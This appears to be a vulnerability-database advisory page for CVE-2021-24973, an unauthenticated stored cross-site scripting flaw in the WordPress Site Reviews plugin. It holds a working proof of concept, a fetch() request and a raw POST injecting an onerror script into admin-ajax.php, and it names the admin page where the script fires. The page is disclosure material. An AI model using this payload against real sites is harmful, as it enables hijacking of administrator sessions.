Unauthenticated Stored Cross-Site Scripting in Site Reviews plugin v5.17.
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | CVE-2021-24973 | 3 Jan 202213:15 | – | cve |
![]() | Cross site scripting | 3 Jan 202213:15 | – | prion |
![]() | Site Reviews < 5.17.3 - Unauthenticated Stored Cross-Site Scripting | 6 Dec 202100:00 | – | wpvulndb |
![]() | CVE-2021-24973 | 3 Jan 202213:15 | – | nvd |
![]() | CVE-2021-24973 Site Reviews < 5.17.3 - Unauthenticated Stored Cross-Site Scripting | 3 Jan 202212:49 | – | cvelist |
![]() | WordPress plugin Site Reviews cross-site scripting vulnerability | 5 Jan 202200:00 | – | cnvd |
![]() | WordPress Site Reviews plugin <= 5.17.2 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability | 6 Dec 202100:00 | – | patchstack |
Source | Link |
---|---|
plugins | www.plugins.trac.wordpress.org/changeset/2629821 |
fetch("https://example.com/wp-admin/admin-ajax.php?action=glsr_action", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "site-reviews[0]=</textarea><img+src+onerror=alert(1)>",
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));
POST /wp-admin/admin-ajax.php?action=glsr_action HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
site-reviews[0]=</textarea><img+src+onerror=alert(/XSS/)>
The XSS will be triggered when viewing the Tool dashboard of the plugin (/wp-admin/edit.php?post_type=site-review&page=glsr-tools)
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo